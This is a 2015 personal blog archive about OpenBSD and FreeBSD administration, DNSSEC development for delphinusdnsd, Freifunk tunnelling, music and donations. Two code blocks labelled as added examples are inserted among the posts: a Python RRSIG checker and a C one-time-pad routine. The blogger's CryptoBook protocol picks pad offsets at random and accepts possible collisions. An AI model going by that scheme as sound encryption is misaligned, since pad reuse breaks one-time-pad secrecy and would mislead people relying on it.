Gilles Chehade of OpenBSD/OpenSMTPD fixed the OpenBSD 5.5 and higher version of opensmtpd with this patch. I run FreeBSD with an old port of opensmtpd on io.solarscale.de (one of my vps's) and I have backported this patch to there. Thanks Gilles! Patch is here. Apply it from the smtpd directory inside the release.



Exploring Xephem

April 21st, 2015

Look at this excerpt printed to .ps and later converted to .jpg with gimp.

This came from xephem 3.7.7 RC3, a fantastic program. One thing I noticed, however, is that if you go forward in time the position of the Vernal Equinox, which is indicated here as "VEq", does not shift. In another program called stellarium it does change, and the coordinates of RA/DEC change as well with time. I don't know if this is proper that these coordinates change with time but as a rule always provide the date when giving RA/DEC coordinates please. Future Astronomers (in 2500 years) may appreciate that.



Vernal Equinox and Jesus

April 22nd, 2015

Forgive me, I'm not really religious. I believe in a god though. When playing with xephem I noticed that the vernal equinox happened around the time Jesus died, in easter. And what is really interesting in this all is that the vernal equinox back then was really close to the constellation Aries. Given mistakes in calculations I beg to tell that Jesus's death was the start of a new age, the Age of Pisces. The time when the vernal equinox would be in the constellation pisces for 2160 years or so. It isn't exactly 2160 years but close. The next age is Aquarius and I wonder if Jesus will reappear just before that time too. Now you may think that this is too Astrologic mumbo jumbo... but the fact is that with precession of the equinoxes the point in the sky for the vernal equinox moves in retrograde fashion.



Bought two singles

April 22nd, 2015

I bought Tommy Lee Sparta's Hero and Spartan Soldier. Thanks goes to SVPRadio for making me aware of the first song, and I took a liking to the second as well, it reminds me of the Film that I watched in German called 300. Thanks goes to Youtube for teasing me to buy this.



Donated 50 euros to OpenBSD

April 22nd, 2015

Forgot about blogging this. Last friday I made the transaction to Theo. This is the 2nd quarter donation bringing up donations to 100 euros for this year.



And the Park seemed inviting

April 24th, 2015

My doctors always tell me I should walk more in order to get healthier so I went to the park today.

Sorta like what Carl Sagan said about the cosmos, we've tested the water and the water seemed inviting. I think I'll be doing more of this this spring.



Happy 25th anniversary Hubble!

April 24th, 2015

25 years ago the Hubble Space Telescope was launched into low earth orbit. It allowed astronomers to see stars, nebulas, galaxies and other universe properties without having to worry about cloud cover interference. Happy Birthday Hubble!

Feel free to browse through any of these, there are some really awesome photos, especially in the first link (check its archive).



OpenBSD getting hammerfs through GSOC?

April 28th, 2015

Google has announced their students for Google Summer of Code. OpenBSD is participating and I think the highlight is porting HAMMER2 to OpenBSD. Here is an introduction to HAMMER at DragonFlyBSD's website. I'm intrigued and excited, but also a little concerned whether I'd be able to run hammer with all its options. Nonetheless a brilliant code!



Goodbye Avon!

April 29th, 2015

When my family and I immigrated to Canada in 1987 (we eventually returned to Germany) I attended Avon Public School for grade six. Checking up on Stratford News I noticed the school building closed in 2005 and just recently torn down / demolished. I guess the school only remains a memory now more than before.



Httpd died overnight

April 30th, 2015

Apr 30 01:10:32 supercluster httpd[19759]: logger exiting, pid 19759
Apr 30 01:10:32 supercluster httpd[32319]: server exiting, pid 32319
Apr 30 01:10:32 supercluster httpd[2355]: server exiting, pid 2355
Apr 30 01:10:32 supercluster httpd[28754]: server exiting, pid 28754
Apr 30 01:10:32 supercluster httpd[28494]: server exiting, pid 28494
Apr 30 01:10:32 supercluster httpd[12653]: server exiting, pid 12653
Apr 30 01:10:32 supercluster httpd[5519]: server exiting, pid 5519
Apr 30 01:10:32 supercluster httpd[6672]: server exiting, pid 6672
Apr 30 01:10:32 supercluster httpd[31236]: server exiting, pid 31236
Apr 30 01:10:32 supercluster httpd[10641]: server exiting, pid 10641
Apr 30 01:10:32 supercluster httpd[22967]: parent terminating, pid 22967

No indication of what caused it though. I did have a lot of Chinese IPs try to log in as root on my sshd on port 1022 though. Anyways the httpd is back up.



OpenBSD CD's delayed, upgraded anyways

May 2nd, 2015

Well my May 1st went like always. Early in the morning I ftp'ed my OpenBSD stuff that I needed to upgrade to 5.7. And I upgraded my computers here at home throughout the day. I believe the OpenBSD store apologized and said they'd be shipping the CD's around May 7th. There was talk of a damaged master CD and the delay at the manufacturing plant producing the CD's. DeRaadt mentioned this is the first time in 20 years this has happened. I wonder what outside forces caused this... oh well we'll never know.

My setup with chrome being exported from another account stopped working, and I didn't realise it. I noticed I couldn't move the window anymore, it was stuck where it opened. So I thought the window manager was to blame and I tried out kde4. KDE4 is good and all but I couldn't set a timezone. Then after 2 logins it wouldn't load and left me with a blank screen after login. It had to go. So I went back to fluxbox wm and got rid of the chrome browser hack, now chrome worked fine. This leaves me somewhat vulnerable but at least I can paste urls again, a feature that was greatly missed.



Pension, TV and Books

May 8th, 2015

I managed to get a raise of pay. I can now restart paying into a pension fund and perhaps I'll get that TV. I haven't had a TV in probably 17 years that I owned. I have an Apple TV that I'd connect to it and watch youtube probably, LOL. Also I'll be able to buy more books this year. I'm all around happy. I'll also have to pay catch up to last year since last year the CADEUR (virtual currency, CAD and EUR exchange rate) was not in my favour. This year it seems to be picking up again to 2013 values.



Where do you get your clothes?

May 9th, 2015

Here in Schweinfurt we had one store catering to oversized people (fittingly called Goliath). In early 2014 they closed. So what I do is get my clothes online. My T-Shirt size is 6XL so going shopping in regular stores is out of the question. Just recently I bought a whole batch of boxershorts and t-shirts for like 200 euros from Adamo. The payment and delivery were flawless (per DHL). If you know of any other online stores catering to oversized people in Germany or EU let me know, I'd be interested.



Purchased more Reggae

May 9th, 2015

I have bought today the Demarco True Friend EP, and Jah Vinci - best of Jah Vinci album. I'll be listening to these shortly.



Purchased DJ mixer

May 12th, 2015

Back when I was 19 I had a Gemini ScratchMaster mixer. This mixer I just bought is far from the thing I had back then. It connects via USB to Mac and IOS devices. It was only 124 euros so I felt it was affordable. I plan on DJ'ing for SVPradio where I'd construct a mixing session and DJ Jaz downloads it and streams it to the server. Should be interesting anyhow.



Donated 25 euros toward Nepal

May 12th, 2015

I have donated 25 euros for the Nepalese people. I used Spendenkonto Nothilfe to transfer the funds from my bank account. Here's to hoping for recovery for the Nepalese people.



Anexit

May 13th, 2015

I had a chance to talk to Anexit on IRC today. He asked me what my webpage was and I asked his anexit.net, very interesting blog he's got. Anexit is experienced with BSD and this makes it so great to talk to him. Lately he's very busy with his baby daughter but otherwise you could catch him at a BSDCan conference.



Freifunk Tunnel Masters

May 15th, 2015

As you may know freifunk.net tunnels to the outside world. I have made another step. Instead of tunneling to the freifunk.net servers directly from my DSL I'm tunneling through a VPS of mine first. This has the benefit that I can encrypt the traffic leaving the DSL and it can't be picked up by my ISP when they compare a list of servers whether I have freifunk.net. I'm using my udptunnel program that is still closed source but I plan on overhauling it as it doesn't quite encrypt just yet, it just HMAC's. Gonna work on that this weekend. If you don't know what I mean above just think of a tunnel that gets tunneled. My vps is showing 5% more CPU on average and I suspect it's a similar story with my router here at home. Also right now I do about 200 GB of traffic so my VPS sees twice that amount. Because the VPS is in Amsterdam there is more latency on the freifunk link, but it gets discounted the fastpath on my DSL, so it's about even as if I had just changed providers.



OpenBSD 5.7 arrived

May 15th, 2015

15 days after I installed 5.7 on all my systems the CD's arrived. This doesn't really make me mad. But then I checked CD2 and this is what I found:

mercury# cd /cdrom
mercury# ls
5.7        OFWBOOT    PORTS      SHA256.SIG
HARDWARE   PACKAGES   README     TRANS.TBL
mercury# more TRANS.TBL
D 5.7                                   5.7
F HARDWARE                              HARDWARE
F OFWBOOT                               ofwboot
					^^^^^^^^

Notice the ofwboot should have been lowercase when I read the CD. This is probably a broken disk. It still doesn't make me mad. I got a great booklet and stickers, and that makes me very happy. The CD's are probably coasters and I hope the plant screwup doesn't repeat itself for 5.8. I'm glad to support Theo de Raadt and OpenBSD, even when the CD's are screwed up once in a while, they are still a plastic receipt that I buy into this product.



Holidays less than a month away

May 19th, 2015

I'm looking forward to my holidays. Simply because I'll be working on Delphinusdnsd to put DNSSEC into it. I hope I will succeed with that, it's my major personal project for this year and I hope I don't get side-tracked. I've got 3 weeks to get something written. I'm looking forward to releasing delphinusdnsd 1.0.0 in November 2015.



My udptunnel program is open source now

May 21st, 2015

The udptunnel that I use to tunnel freifunk with is now open source. You can look at it through here. Enjoy.



Pre-Ordered Ten of Hearts

May 21st, 2015

I have pre-ordered Alaine's Ten of Hearts album, which is scheduled to be released in 5 days or so. I have Alaine's Without You album and I like how she sounds.



Advocacy for OpenBSD

May 21st, 2015

On the OpenBSD Journal there was an article that featured this article to show among others that OpenBSD is and I quote "an important ingredient in an EU strategy for more security and technological independence".

When I came to the EU, I had OpenBSD 3.1 in my pocket with me and I used this almost at any opportunity. I have been lucky. I grew up with this stuff in Canada since age 19 and OpenBSD releases since 2.5. Right now I don't have a consumer router but rather an enterprise router made by Soekris running OpenBSD. I plan on getting a PC-Engines APU router to run OpenBSD on it soon. Both these routers allow me this security and technological independence, talked about in the above article. The consumer routers over and over again prove to be unreliable and faulty security wise.



Computers are better Rappers? Perhaps...

May 22nd, 2015

I grew up on hip hop and rap in my teenager years. I had a language burden to overcome and it wasn't easy, but I think I got the point. Now then researchers in Finland have developed a rapping algorithm called deep beat (german link). And this may be good and all and I'm sure the algorithm will be used to produce Hip Pop, but what the mainstream media never knew was that it wasn't the glorious rappers that interested us. We wanted to hear the message, and the perfection of a human to deliver this on to us. Now you can write a rhyme and practice it but how well are you gonna be in freestyling. That's where people get mad respect. Sure they recycle parts they practiced before probably but rapping from the head top isn't an easy thing. In my experience hip hop was the experience itself and that can't be told, you have to experience that yourself. I look up to the god and my friends who gave me a message that was, what's the word, benevolent. If you want to understand I invite you to watch 40 years of Hip Hop by KRS-One. I can't guarantee you'll understand it but he tries to teach you. My personal take on hip hop is that to repeat what I experienced in the 1990's you'd have to time travel, it cannot be repeated. Some qualities and friendships remain from that time because we know what we went through in those days. I am gonna stop, there are no words to this...



Purchased another Album

June 4th, 2015

This one is from Richie Spice "Book of Job". I'm going to listen to it now.



Vacation in a week

June 5th, 2015

I go on vacation in a week. I'm really excited. I hope I'm going to get a lot of programming done then, as I have 3 weeks vacation.



Purchased two Books

June 6th, 2015

I haven't purchased a book in at least three months. It's time to get something fresh. I got: Postfix: The Definitive Guide (Classique Us), Kyle Dent... and Hacking Exposed Wireless: Wireless Security Secrets and Solutions, Joshua Wright and Johnny Cache. These will give me something to read during the holidays and perhaps inspire me.



I'm on Vacation

June 13th, 2015

Finally! Now the Delphinus DNS is gonna get dusted off and I'll be planning how I'm gonna do this in the next few days. I have 3 weeks to get something working. Also the summer solstice will be around in a week or so. Be prepared for that! It's when the sun is at its highest in the northern hemisphere and at its lowest in the southern hemisphere. It is also the official start of summer in the northern hemisphere until the september equinox.



Delphinusdnsd Hack days, entering production..

June 18th, 2015

This is a status update of how my progress on putting DNSSEC into delphinusdnsd is going. I haven't started on the DNSSEC part yet but I have partitioned/fragmented the database structure on delphinusdnsd with the underlying BerkeleyDB. I then had to iron out a few bugs also caused by taking out code. I was able to put delphinusdnsd into production today but I'm monitoring it carefully. At any time I can switch back the old stable wildcarddnsd that was running on io.solarscale.de until today. Next steps are to look at how my zone signer tool is working, it'll likely take me a bit since it's written in ruby. You won't see this tool until later, it's not in the CVS tree yet. Those curious to watch what is being changed can do so at the delphinusdnsd viewvc.



The First Ever DNSSEC answer from Delphinusdnsd

June 20th, 2015

From my offline lab:

;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27891
;; flags: qr aa; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;centroid.eu.                   IN      A

;; ANSWER SECTION:
centroid.eu.            86400   IN      A       10.10.10.10
centroid.eu.            86400   IN      RRSIG   A 5 2 86400 20150720035019 \
20150620025019 65076 centroid.eu. DL+H2ilV8W9Ft34kryxm74+aaO5ZI3xe23++lXb44\
jOksKtQBG5wSvDT uFpe2+QbVVG9UVBt0orrufzr2X1DB4y3t1Vuo6azX3GeXLixnwW1DHiO dV\
DBqfKRMTyoHosQKgaZzkcFQL9l+TDPdfWqAClKNx3LX/56UQycKTmp O/Y=

;; Query time: 0 msec

I'm still in the process of ironing out bugs and adding functionality...stay tuned!
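
The fields of the RRSIG record in the answer above, parsed and sanity-checked against RFC 4034 section 3 as an added example (this is not delphinusdnsd code). The function names and the choice of checks are this example's own, and the checks are structural only: no signature is verified.

```python
import base64
from datetime import datetime, timezone

# A few DNSSEC algorithm numbers from the IANA registry.
ALGORITHMS = {1: "RSAMD5", 5: "RSASHA1", 7: "RSASHA1-NSEC3-SHA1",
              8: "RSASHA256", 10: "RSASHA512", 13: "ECDSAP256SHA256", 15: "ED25519"}
SHA1_OR_WEAKER = {1, 5, 7}

# The RRSIG line from the answer above, with the continuation backslashes joined.
SAMPLE_RRSIG = (
    "centroid.eu. 86400 IN RRSIG A 5 2 86400 20150720035019 20150620025019 "
    "65076 centroid.eu. "
    "DL+H2ilV8W9Ft34kryxm74+aaO5ZI3xe23++lXb44jOksKtQBG5wSvDT "
    "uFpe2+QbVVG9UVBt0orrufzr2X1DB4y3t1Vuo6azX3GeXLixnwW1DHiO "
    "dVDBqfKRMTyoHosQKgaZzkcFQL9l+TDPdfWqAClKNx3LX/56UQycKTmp O/Y="
)


def _timestamp(field):
    # YYYYMMDDHHmmSS in UTC; the epoch-seconds form RFC 4034 also allows is not handled.
    return datetime.strptime(field, "%Y%m%d%H%M%S").replace(tzinfo=timezone.utc)


def _labels(name):
    # Label count as the RRSIG Labels field defines it: no root label, no leading "*".
    parts = [p for p in name.rstrip(".").split(".") if p]
    return len(parts) - (1 if parts and parts[0] == "*" else 0)


def parse_rrsig(line):
    """Split one RRSIG record in presentation format into named fields."""
    f = line.split()
    if len(f) < 13 or f[3].upper() != "RRSIG":
        raise ValueError("not an RRSIG record in presentation format")
    return {
        "owner": f[0].lower(), "ttl": int(f[1]), "type_covered": f[4],
        "algorithm": int(f[5]), "labels": int(f[6]), "original_ttl": int(f[7]),
        "expiration": _timestamp(f[8]), "inception": _timestamp(f[9]),
        "key_tag": int(f[10]), "signer": f[11].lower(),
        # Whitespace inside the base64 signature is allowed, so join the rest.
        "signature": base64.b64decode("".join(f[12:])),
    }


def check_rrsig(rr, now):
    """Return a list of findings; an empty list means nothing stood out."""
    findings = []
    owner_labels = _labels(rr["owner"])
    if rr["labels"] > owner_labels:
        findings.append("labels field larger than owner name")
    elif rr["labels"] < owner_labels:
        findings.append("answer was synthesized from a wildcard")
    if rr["ttl"] > rr["original_ttl"]:
        findings.append("TTL exceeds original TTL")
    if rr["signer"] != "." and not ("." + rr["owner"]).endswith("." + rr["signer"]):
        findings.append("signer is not the owner or one of its parents")
    if rr["inception"] > rr["expiration"]:
        findings.append("inception after expiration")
    elif now < rr["inception"]:
        findings.append("signature not yet valid")
    elif now > rr["expiration"]:
        findings.append("signature expired")
    if rr["algorithm"] in SHA1_OR_WEAKER:
        name = ALGORITHMS[rr["algorithm"]]
        findings.append(f"algorithm {rr['algorithm']} ({name}) is SHA-1 based")
    return findings


if __name__ == "__main__":
    rr = parse_rrsig(SAMPLE_RRSIG)
    lifetime = rr["expiration"] - rr["inception"]
    print("algorithm:", ALGORITHMS.get(rr["algorithm"], "unknown"))
    print("key tag:", rr["key_tag"], "signature bits:", len(rr["signature"]) * 8)
    print("validity window:", lifetime)
    print(check_rrsig(rr, datetime(2015, 6, 25, tzinfo=timezone.utc)))
```
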



Happy Solstice!

June 21st, 2015

Solstice was great, but we had full cloud cover and it spit a little from above too. Anyhow tomorrow I'm going to be back programming on DNSSEC for Delphinusdnsd and I'm really looking forward to it. Cheers!



Donated 150 euros to the Red Cross

June 22nd, 2015

The city that I live in (Schweinfurt) is getting a refugee centre which is in a part of the old Ledward Barracks, where the US Army used to be. They are opening the centre in July I believe. It serves as a 1st contact site for refugees who are expected to stay in the city for up to 3 months. The Red Cross is overlooking clothing the refugees who aren't expected to have much clothing with them, so I have donated 150 euros and my family added 50 euros more making a total of 200 euros donation. The website of the local red cross is here. BTW yes this is the same Red Cross that I worked for a year as told on my resume.



Delphinusdns Project sponsors Luke Antins

June 22nd, 2015

I have sponsored Luke Antins to add on some resource records on his Ruby dns-zone gem. I'll need this gem to do a conversion tool between BIND and DelphinusDNS zonefiles, and especially do background conversion between signed zones. Luke accepted the work and it's expected to be done by the time I get around to starting the ruby conversion tool, some time next week. Luke has a website at float64.uk. I'm absolutely thrilled about this and I'm so glad that we're able to do this on an open source basis.



Art display of my parents' creations

June 23rd, 2015

My mother and my dad are showing off their work, at the Kunsthalle Schweinfurt starting on the 26th of June until the 12th of July. My mom is a potter and my dad is a photographer, both their work will be on display.

If you're around the Schweinfurt area and appreciate good art, perhaps this will interest you. This may be my parents' last display together, so this is a unique view of their display suitably called "signatures of time - double play". I'll likely visit this art exhibit on Friday when I'm in the area of the art gallery. I won't be at the opening unfortunately.



Vacation cut short

June 24th, 2015

Unfortunate events at work have cut my vacation short. I'm back working. What does this mean for delphinusdnsd? I don't know, I can't finish it on my vacation now. I'll see if I can get some time off in September or so.



Donated 50 euros to OpenBSD

June 25th, 2015

I just wrote a 50 euro donation to Theo de Raadt. I'll be bringing the transfer to the bank tomorrow.



RFC 4034 compliant AFAIK

June 25th, 2015

I have added NSEC, and DS RR's to delphinusdnsd in the last 24 hours. I believe with a bit of converting effort a signed DNSSEC zone being served would be possible. But I don't want to stop there yet. I still want to do NSEC3 and NSEC3PARAM (RFC 5155). And a frontend to a zonesigning tool written in Ruby will be on the menu too, not sure when I have time for that though. You can check out the CVS repo at emea.centroid.eu if this interests you at all.



Status update on Delphinusdnsd and DNSSEC

June 28th, 2015

Well a lot was done but a lot of work remains.

  • NSEC and NSEC3 need to be added to NOERROR and NXDOMAIN replies
  • SOA replies need NSEC* I think.
  • PTR replies and CNAME still need RRSIG addons
  • Any replies and AXFR still need to be including the new RR's
  • The ruby conversion tool needs to be finished, right now I'm converting BIND style zones by hand

And then I need to go through the checklists and debug. I think I'll do that in October when I perhaps will get another holiday for a week (to make up for my cancelled vacation). I figure there is about 2-3 more weeks of work left to do (at about 1-2 hours a day).



AKW Grafenrheinfeld has shut down over night

June 28th, 2015

According to this article at telepolis the nuclear power plant at Grafenrheinfeld, which is about 8 km from here, has shut down, forever, last night. I'm very happy about this. Here is a picture of this plant:

The linked article tells that there are 8 nuclear power plants left in Germany. I hope they shut soon as well.



I have donated 20 euros to the Greece bailout fund

July 3rd, 2015

There is a fundraiser going on to bail out Greece. I first read about this here. So I have added 20 euros to this fund. If everyone in the EU donates 20 euros then we'd have bailed them out over 5 times the amount. Or if every family of five spends 20 euros we'll have hit the mark. Good luck Greece!



Power outage this morning

July 4th, 2015

We had a power outage this morning and a transformer exploded causing a 40 minute outage to many parts of Schweinfurt. All my computers have reset but thankfully none were damaged. I had one router with a 4000 hour uptime or so, it has now reset. So I'm not gonna learn from this because I already made plans to buy a bunch of UPS's in late August. It'll be three in total: one for my setup in my living room, one for the hallway and one for my home office. Hoping the electricity grid will hold until then.



It definitely was hotter than 2003

July 6th, 2015

Yesterday was the hottest day on record, seriously (since 1884 when records started being kept). Spectacularly we had a thunderstorm and lots of lightning yesterday night when the darkness came. It lowered the temperature by half in a matter of 1 hour or so. Now we have 23 degrees C and a bit of breeze, but it's probably gonna get hot again.



Freifunk was affected by an MTU issue

July 7th, 2015

A router at the N-IX exchange point caused fragmented packets of my tunnel to be thrown out. Here is the traceroute:

venus# traceroute io.solarscale.de 1538
traceroute to io.solarscale.de (78.47.14.22), 64 hops max, 1578 byte packets
 1  ppp-default.m-online.net (82.135.16.28)  16.24 ms  16.091 ms  15.946 ms
 2  xe-2-0-1.r5.nue1.m-online.net (212.18.6.79)  16.252 ms  16.225 ms  16.196 ms
 3  * *^C

The third hop would have been:

 3  nix-gw-2.hetzner.de (195.85.217.30)  6.837 ms  7.292 ms  7.099 ms

So I have notified hetzner.de of this routing issue. Many protocols require fragmentation, including DNS with DNSSEC. But also my freifunk tunnels required this and for the past three weeks service was affected. Sorry to my freifunkers who have seen problems. I have routed to my backup tunnel which doesn't have this issue.



Signatures of Time - Double Play

July 9th, 2015

Today I was at my parents' art exhibition at the Kunstverein Schweinfurt. It was excellent, I really enjoyed it. I made this photo.

Afterwards I had lunch with my parents, and was able to congratulate them on a very good exhibition. They told me some articles were already sold. Those with a red dot near them, which I didn't notice but I'm happy for them.



Hand-Down and a Story

July 10th, 2015

I have handed down the above items to someone in Erlangen city as a gift to Freifunk Franken. The items are 2 x 20 feet of Wifi antenna cable with barrel connectors on each end and a 2.4 GHz Antenna possibly a Lucent. I bought these in Toronto in the year 2000.

Back in 2000, I wanted to be a provider of internet services (I still do). And wifi came on the scene. I envisioned back then that perhaps I could network a neighbourhood and have them downstream of a 10 Mbit/s ethernet to another provider. So I bought as a test base 3 wifi cards of the pcmcia type and 3 antennas and 2 cables of the above kind. I never got to play with these because of a missing component which was called pigtails. And I was extremely busy so I never got around to playing with these. The dream wasn't crushed it just never was fulfilled.

Today there is a citizen organisation called Freifunk in Germany that pretty well does all this stuff that I envisioned back then. It's 15 years later now, progress was made. I'm fairly happy with how things are going so I'm parting with this stuff.



Status update of Delphinusdnsd and DNSSEC

July 10th, 2015

I didn't get much done last week since it was too hot. The weather has calmed a little and it's gotten cooler so I'm anxiously waiting to get back to it. I'm currently working on NSEC3 replies on NXDOMAIN and NOERROR answers. I still have to do AXFR and ANY answers, as well as DS replies upon delegation requests. Then comes the challenging part of writing a ruby wrapper to sign zones. I have lots of time until release though which will be in November. I'm gonna take it in stride.



Purchased Reggae

July 11th, 2015

I have gotten an EP and a Riddim:

  • Her Name is Denyque - Denyque
  • City Life Riddim

I'll be listening to this now.



Purchased Netbook

July 13th, 2015

Almost 3.5 years after getting my last netbook, I have gotten a new one. It'll be here in 6-9 business days. It's an Acer Aspire V3 I believe... yep. I'm crossing my fingers that this laptop allows OpenBSD to run because of the UEFI thing that discourages users of open source. Anyhow this netbook is similar to the old perhaps a bit faster. I'm using both netbooks for a project of mine, meaning I won't keep them long. Details of the project will emerge in time.



Donated $15 to FreeBSD Foundation

July 15th, 2015

15 seems to be the number of the day, it was spontaneously picked. It's interesting that the US dollar and the Euro are almost 1:1. Anyhow this concludes my yearly donations to FreeBSD, I still have a bit of money for OpenBSD to be distributed next season (after september).



My CryptoBook

July 17th, 2015

I purchased an Acer Aspire V3-112. It didn't get full support from OpenBSD. But that's not what I purchased it for. I will now reveal what I purchased it for. My Uncle asked me "how do you encrypt?", and I told him "it's very difficult". There are several factors why it's difficult.

  • Encryption is very hard to do right as a programmer
  • Encryption tools that promise full privacy often lie
  • Often complexity gets in the way of something that should be simple.
My Uncle seemed a little impatient with me. I told him that a one time pad is perfect encryption given the fact that the pad is not repeated, and it's simple to make. We left it at that. But it got me thinking how I can give the gift of encryption to my Uncle. And I thought of my netbook which was affordable still and runs OpenBSD, if I could give him a netbook that does everything then we solved a problem.

So I bought pluto, this netbook. At first I envisioned writing the OTP program in X11 but when pluto turned out to not like X11, I turned toward the console. I wrote a script that calls a compiled program that handles the one time pad. As it turned out the script didn't function right and I had to rewrite it in C. So imagine you get a netbook and you turn it on and it says this:

So the protocol I developed works on a one time pad. The pad can be generated with this cryptobook. OpenBSD has a fairly cool random number generator, however, to guarantee complete safety this cryptobook does not talk over the network. It can't; I have removed all network drivers from the kernel. So the only way to transfer files to/from this cryptobook is with a memstick. Just as long as you know that a memstick with a FAT32 filesystem can only hold a 4 GB sparse file minus one byte. That would be the pad. Now OpenBSD takes all sorts of sources for entropy, but I have removed the network drivers and everything else is pretty much guessable. So I have turned the microphone on permanently as a background job that writes everything it hears to /dev/null. When generating the pad I hope someone is gonna listen to some funky music that stirs the random number generator well.

Back to the protocol. Since my dad told me, my Uncle doesn't send too much mail in a year, the problem of keeping track of offsets of the pad pretty well solved itself. I generate a random number for the offset of the pad. Now there is a chance that there is a collision which renders the message useless. But I think we'll get lucky with low encrypted traffic. So what happens is you put the documents you want encrypted into a special directory. Then you choose "encrypt" on the cryptobook and it chooses those files in the directory to be encrypted by the pad. Similarly, to decrypt there is another directory to stick encrypted files in and it'll decrypt them. The offset of the pad is part of the header on encrypted files.
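
The offset-in-header scheme described above, as an added example in C (not the CryptoBook's own program): the 8-byte big-endian header, the function names, the in-memory ledger of used pad ranges and the small deterministic pad are assumptions made for illustration. It goes one step beyond the text by refusing an offset whose range overlaps pad bytes already used, so the caller can draw another one.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HDR_LEN    8	/* assumed header: 64-bit big-endian pad offset */
#define MAX_RANGES 64

struct range  { uint64_t off, len; };
struct ledger { struct range used[MAX_RANGES]; size_t n; };

/* 1 if [off, off+len) touches pad bytes an earlier message consumed. */
static int ledger_overlaps(const struct ledger *l, uint64_t off, uint64_t len)
{
	for (size_t i = 0; i < l->n; i++)
		if (off < l->used[i].off + l->used[i].len &&
		    l->used[i].off < off + len)
			return 1;
	return 0;
}

/*
 * XOR msg with pad[off..off+len) and write header + ciphertext to out
 * (HDR_LEN + len bytes). Returns 0, or -1 if the range runs past the pad,
 * -2 if it collides with used pad bytes, -3 if the ledger is full.
 */
int otp_encrypt(const uint8_t *pad, uint64_t padlen, struct ledger *l,
    uint64_t off, const uint8_t *msg, size_t len, uint8_t *out)
{
	if (off > padlen || len > padlen - off)
		return -1;
	if (ledger_overlaps(l, off, len))
		return -2;
	if (l->n == MAX_RANGES)
		return -3;
	for (int i = 0; i < HDR_LEN; i++)
		out[i] = (uint8_t)(off >> (8 * (HDR_LEN - 1 - i)));
	for (size_t i = 0; i < len; i++)
		out[HDR_LEN + i] = msg[i] ^ pad[off + i];
	l->used[l->n].off = off;
	l->used[l->n].len = len;
	l->n++;
	return 0;
}

/* Read the offset from the header and decrypt into out.
 * Returns the plaintext length, or -1 on a short or out-of-range file. */
long otp_decrypt(const uint8_t *pad, uint64_t padlen,
    const uint8_t *in, size_t inlen, uint8_t *out)
{
	uint64_t off = 0;
	size_t len;

	if (inlen < HDR_LEN)
		return -1;
	len = inlen - HDR_LEN;
	for (int i = 0; i < HDR_LEN; i++)
		off = (off << 8) | in[i];
	if (off > padlen || len > padlen - off)
		return -1;
	for (size_t i = 0; i < len; i++)
		out[i] = in[HDR_LEN + i] ^ pad[off + i];
	return (long)len;
}

/* Constructed stand-in pad so the example runs anywhere; a real pad is random. */
void make_demo_pad(uint8_t *pad, size_t len)
{
	for (size_t i = 0; i < len; i++)
		pad[i] = (uint8_t)(i * 37 + 11);
}

int main(void)
{
	uint8_t pad[64], ct[HDR_LEN + 5], pt[5];
	struct ledger l = { .n = 0 };

	make_demo_pad(pad, sizeof(pad));
	/* On the real machine the candidate offset would be drawn at random. */
	printf("offset 10: %d\n", otp_encrypt(pad, sizeof(pad), &l, 10,
	    (const uint8_t *)"hello", 5, ct));
	printf("offset 12: %d (collision, draw again)\n",
	    otp_encrypt(pad, sizeof(pad), &l, 12,
	    (const uint8_t *)"world", 5, ct));
	printf("decrypt:   %ld bytes\n",
	    otp_decrypt(pad, sizeof(pad), ct, sizeof(ct), pt));
	return 0;
}
```

The ledger only knows the ranges used on this machine; two machines that share one pad would have to exchange it or split the pad between them.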

I'm going to leave it at that. If there is more to write I'll do so later. I'm proud of this little project.



Macbook Pro and things

July 23rd, 2015

Yesterday, I bought a Macbook Pro. This wasn't a spontaneous decision, it was something I planned for a longer time. I also bought some other things like an external keyboard (USB Mac), an Intel NUC and a 10 port USB 3.0 Hub (although it only gets detected as a 2.0 Hub for some reason). I also bought Windows 8.1 and I'm looking forward to upgrading it to Win 10. On my old netbook saturn I migrated the windows 7 off there to a vmware fusion vm, it also will see a win 10 upgrade. So I was configuring everything yesterday as I was copying it over and I had a few things that caused me pain. In vmware fusion running OpenBSD and the mac keyboard made the @ sign disappear. I fixed that with researching the manpages and googling. Here is my .xsession as it looks finally:

xset m 10 1
setxkbmap 'de(mac_nodeadkeys)' -print | xkbcomp - $DISPLAY
xrandr -s 1920x1080

exec fluxbox

This allows me to use the keyboard with the @ sign at Alt-L. The ^ sign and > and < signs are reversed on the keyboard still but it beats having to not find the @ sign. I do use the OpenBSD vm for my main things, as I'm in my comfort zone with this. It's a little slower than working with the Xeon which is going to get repurposed into a private cloud computer running bhyve on FreeBSD, but it's a Core i5 after all on this Macbook Pro.

I'll have pictures once I have everything set up like I want it. Right now I'm out of 220V electricity ports and I'm going to soon order my UPS backup solutions that I also wanted to get.



Purchased the Kingston Jamaica Riddim

July 24th, 2015

I liked this riddim when I heard Demarco sing to it. So I purchased it. It's nice.



New Network Plans

July 24th, 2015

I wrote this on a pad today. (Yes it's the pads given out at EuroBSDCon 2011). I'm testing something with beta.swshell.de, something that may make me some money. So temporarily that's how it'll look.



Two CryptoBooks side by side

July 25th, 2015



Opinion: Hacking Team are pigs

July 27th, 2015

I recently read that Hacking Team said they are "victims". Yet they are the ones that sold malware to governments far and wide to infiltrate computers at border points or via the Internet. These guys are low of the low. A good hacker in my mind is a defensive one, not an aggressive offensive one. So these guys are far from good.

This brings up another point. Germany's defence minister is playing with the thought of installing an offensive cyber capability in the German military. What a mistake! Again, work up your defenses not offenses. As the only victims in an offensive military are civilians and we are the ones who really need help.



Delphinusdnsd status update

July 28th, 2015

Well the hot days are over I believe. So I'm itching to get back to this. Perhaps next week I'll be able to write some code as this week is filled in my schedule.



CryptoBooks virtualized

August 2nd, 2015

In order to make use of cryptobook in more parts of my family I have virtualized it. That sorta defeats the point but buying a cryptobook does tend to get expensive. Here is a vmware version of cryptobook:

And here is a virtualbox version of cryptobook:

These aren't for sale unfortunately.



Bought Reggae

August 6th, 2015

I have purchased Romain Virgo's album "The System", it's an older album but I used to watch his videos on youtube.



.. and a Riddim

August 8th, 2015

There are only four songs on the Cloud Nine Riddim. But it's sweet. Too bad they couldn't pack-in an instrumental to this.



Ordered a Book from Amazon

August 9th, 2015

